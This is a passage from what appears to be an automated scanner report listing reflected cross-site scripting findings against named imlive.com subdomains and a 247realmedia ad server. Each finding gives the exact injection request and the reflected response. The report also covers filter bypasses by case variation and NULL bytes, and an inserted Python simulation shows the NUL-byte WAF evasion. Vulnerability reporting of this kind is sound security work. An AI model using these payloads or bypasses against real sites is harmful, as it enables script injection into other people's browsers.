if (mm247o.length==21) {
   var i=0;
   while (i<21) {
       mm247m += mmarray[i] + mm247o.charAt(i);
       i=i+1;
   }
}
document.cookie="mm247="+mm247m+";expires="+mm247d.toGMTString()
...[SNIP]...

4.698. http://nl.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nl.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54070'-alert(1)-'486543e8cd0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?54070'-alert(1)-'486543e8cd0=1 HTTP/1.1
Host: nl.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=c034ran2nxljb43o0d1er5my; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=c034ran2nxljb43o0d1er5my; path=/; HttpOnly
Set-Cookie: spvdr=vd=aac8efee-19e5-488d-a8b9-e4ac7d66bb67&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:16 GMT; path=/
Set-Cookie: inl=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:16 GMT
Connection: close
Content-Length: 18736
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nl-NL" lang="nl-NL" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=nl.imlive.com&ul=/?54070'-alert(1)-'486543e8cd0=1&qs=54070'-alert(1)-'486543e8cd0=1&qs=54070'-alert(1)-'486543e8cd0=1&iy=dallas&id=44&iu=1&vd=aac8efee-19e5-488d-a8b9-e4ac7d66bb67';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

4.699. http://nl.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nl.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b38ce"><ScRiPt>alert(1)</ScRiPt>70a1d0b675c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /?b38ce"><ScRiPt>alert(1)</ScRiPt>70a1d0b675c=1 HTTP/1.1
Host: nl.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=bkwd0p3ok5ihyg55ga3chv45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=bkwd0p3ok5ihyg55ga3chv45; path=/; HttpOnly
Set-Cookie: spvdr=vd=3419e649-d6e5-4718-8e93-cb3b4fbfb4cb&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:16 GMT; path=/
Set-Cookie: inl=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:15 GMT
Connection: close
Content-Length: 19137
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nl-NL" lang="nl-NL" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||b38ce"><script>alert(1)</script>70a1d0b675c~1');return false;">
...[SNIP]...

4.700. http://nl.imlive.com/waccess/ [gotopage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nl.imlive.com
Path:   /waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload abf97'onerror%3d'alert(1)'3747a08c954 was submitted in the gotopage parameter. This input was echoed as abf97'onerror='alert(1)'3747a08c954 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/abf97'onerror%3d'alert(1)'3747a08c954 HTTP/1.1
Host: nl.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:24 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: inl=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSQRTQDQC=PKPLFJMAFPAENFFGPJDEIIPJ; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:25 GMT
Connection: close
Content-Length: 8315
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=nl.imlive.com&ul=/webcam-login/abf97'onerror='alert(1)'3747a08c954/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://nl.imlive.com:80/webcam-login/abf97'onerror='alert(1)'3747a08c954/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

4.701. http://no.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://no.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0019f9e"><script>alert(1)</script>4ba4bc172bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 19f9e"><script>alert(1)</script>4ba4bc172bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
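The filter mismatch described above, as an added example that is not part of the report: a Python simulation (the filter, its signature list and the handler are assumed stand-ins, not the products involved) of a native-code check that matches on a NUL-terminated view of the URL-decoded parameter, beside a length-aware check, and a managed-code handler that, like the ASP.NET page in this finding, treats the NUL as an ordinary character and reflects everything after it. The payload is the one from the finding.

```python
"""Simulation of the NUL-byte filter bypass in finding 4.701 (added example, not report content)."""
from urllib.parse import unquote_to_bytes

# Assumed signature list for the simulated filter; real products differ.
BLOCKED = (b'<script', b'onerror', b'javascript:')
PAYLOAD = b'%0019f9e"><script>alert(1)</script>4ba4bc172bb'   # the finding's payload, as sent on the wire


def c_string_view(buf):
    """What a NUL-terminated (C-style) string routine sees: the bytes before the first 0x00."""
    return buf.split(b'\x00', 1)[0]


def native_waf_blocks(raw_param):
    """Simulated native-code WAF: URL-decodes, then matches the way strstr() would, stopping at the NUL."""
    visible = c_string_view(unquote_to_bytes(raw_param)).lower()
    return any(sig in visible for sig in BLOCKED)


def length_aware_waf_blocks(raw_param):
    """Corrected check: match over the full decoded buffer and reject an embedded NUL outright."""
    decoded = unquote_to_bytes(raw_param)
    return b'\x00' in decoded or any(sig in decoded.lower() for sig in BLOCKED)


def app_renders(raw_param):
    """Simulated managed-code handler (length-prefixed strings): the NUL is one more character,
    so everything after it reaches the page, as the reflection in the finding shows."""
    decoded = unquote_to_bytes(raw_param).decode('latin-1')
    return ('<a href="http://imlive.com/" onclick="dAccess(\'http://imlive.com/uaccess/0/||'
            + decoded + '~1\');return false;">')


def evaluate(raw_param=PAYLOAD):
    """(native WAF blocks it, length-aware WAF blocks it, a <script> tag reaches the page)."""
    return (native_waf_blocks(raw_param), length_aware_waf_blocks(raw_param),
            '<script>' in app_renders(raw_param))
```

With the leading %00 the simulated native filter sees an empty string and lets the request through while the handler still emits the script tag; without it the same signature list catches the payload. The fix belongs in the handler (encode on output), with the filter's NUL handling as a secondary hardening.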

Request

GET /?%0019f9e"><script>alert(1)</script>4ba4bc172bb=1 HTTP/1.1
Host: no.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=okhzdf55dmwfwo454ybn1y55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=okhzdf55dmwfwo454ybn1y55; path=/; HttpOnly
Set-Cookie: spvdr=vd=156b6ee5-1005-4d39-882a-3bd71de99522&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:17 GMT; path=/
Set-Cookie: ino=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:16 GMT
Connection: close
Content-Length: 19351
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nn-NO" lang="nn-NO" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||%0019f9e"><script>alert(1)</script>4ba4bc172bb~1');return false;">
...[SNIP]...

4.702. http://no.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://no.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0a13'-alert(1)-'2db01fc98e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?b0a13'-alert(1)-'2db01fc98e2=1 HTTP/1.1
Host: no.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=dvipok55uqqpk5mzl2oh2bmd; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=dvipok55uqqpk5mzl2oh2bmd; path=/; HttpOnly
Set-Cookie: spvdr=vd=09b187c9-533d-4717-92f4-f93e601cfbd0&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:18 GMT; path=/
Set-Cookie: ino=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:17 GMT
Connection: close
Content-Length: 18872
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nn-NO" lang="nn-NO" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=no.imlive.com&ul=/?b0a13'-alert(1)-'2db01fc98e2=1&qs=b0a13'-alert(1)-'2db01fc98e2=1&qs=b0a13'-alert(1)-'2db01fc98e2=1&iy=dallas&id=44&iu=1&vd=09b187c9-533d-4717-92f4-f93e601cfbd0';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

4.703. http://no.imlive.com/waccess/ [gotopage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://no.imlive.com
Path:   /waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload be3dc'onerror%3d'alert(1)'5045d73ef51 was submitted in the gotopage parameter. This input was echoed as be3dc'onerror='alert(1)'5045d73ef51 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/be3dc'onerror%3d'alert(1)'5045d73ef51 HTTP/1.1
Host: no.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:24 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: ino=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQQTQRCSD=FAOLDJMABFDNBFGJJENBGHOA; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:24 GMT
Connection: close
Content-Length: 8316
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=no.imlive.com&ul=/webcam-login/be3dc'onerror='alert(1)'5045d73ef51/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://no.imlive.com:80/webcam-login/be3dc'onerror='alert(1)'5045d73ef51/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

4.704. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33/615353505/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33/615353505/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f56b8"><script>alert(1)</script>a852931ac4b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that this response is served with Content-Type: text/plain and carries no X-Content-Type-Options header. A browser that honours the declared type renders the body as text when the URL is loaded as a document and does not execute the injected script; the injection fires only in browsers that sniff text/plain responses for HTML markup (Internet Explorer of this period does so unless X-Content-Type-Options: nosniff is sent). The same applies to 4.705 through 4.708, which return the same ad-tag resource.

Request

GET /RealMedia/ads/adstream_lx.ads/www.soundingsonline.comf56b8"><script>alert(1)</script>a852931ac4b/index.php/L33/615353505/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:59:59 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 805
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<!-- Ad Tag: Dominion 728x90 -->
<script type="text/javascript">
var _bizo_ad_partner_id = "847";
var _bizo_ad_section_id = "ATF";
var _bizo_ad_width = "728";
var _bizo_ad_height = "90";
var _b
...[SNIP]...
<IMG SRC="http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.soundingsonline.comf56b8"><script>alert(1)</script>a852931ac4b/index.php/L33/1487956133/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

4.705. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33/615353505/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33/615353505/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ba76"><script>alert(1)</script>a361e94a73 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php3ba76"><script>alert(1)</script>a361e94a73/L33/615353505/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:59:59 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 804
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<!-- Ad Tag: Dominion 728x90 -->
<script type="text/javascript">
var _bizo_ad_partner_id = "847";
var _bizo_ad_section_id = "ATF";
var _bizo_ad_width = "728";
var _bizo_ad_height = "90";
var _b
...[SNIP]...
<IMG SRC="http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php3ba76"><script>alert(1)</script>a361e94a73/L33/1730429269/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

4.706. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33/615353505/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33/615353505/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fca2b"><script>alert(1)</script>29b9cf2ceff was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33fca2b"><script>alert(1)</script>29b9cf2ceff/615353505/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:59:59 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 807
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<!-- Ad Tag: Dominion 728x90 -->
<script type="text/javascript">
var _bizo_ad_partner_id = "847";
var _bizo_ad_section_id = "ATF";
var _bizo_ad_width = "728";
var _bizo_ad_height = "90";
var _b
...[SNIP]...
<IMG SRC="http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33fca2b"><script>alert(1)</script>29b9cf2ceff/L/1509490205/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

4.707. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33/615353505/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33/615353505/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a381"><img%20src%3da%20onerror%3dalert(1)>1394e7e2a7b was submitted in the REST URL parameter 8. This input was echoed as 4a381"><img src=a onerror=alert(1)>1394e7e2a7b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33/615353505/Top4a381"><img%20src%3da%20onerror%3dalert(1)>1394e7e2a7b/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:00:00 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 807
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<!-- Ad Tag: Dominion 728x90 -->
<script type="text/javascript">
var _bizo_ad_partner_id = "847";
var _bizo_ad_section_id = "ATF";
var _bizo_ad_width = "728";
var _bizo_ad_height = "90";
var _b
...[SNIP]...
<IMG SRC="http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33/254616207/Top4a381"><img src=a onerror=alert(1)>1394e7e2a7b/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

4.708. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33/615353505/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33/615353505/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 385a6"><script>alert(1)</script>9acac63b02a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33/615353505/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c?385a6"><script>alert(1)</script>9acac63b02a=1 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:59:58 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 807
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<!-- Ad Tag: Dominion 728x90 -->
<script type="text/javascript">
var _bizo_ad_partner_id = "847";
var _bizo_ad_section_id = "ATF";
var _bizo_ad_width = "728";
var _bizo_ad_height = "90";
var _b
...[SNIP]...
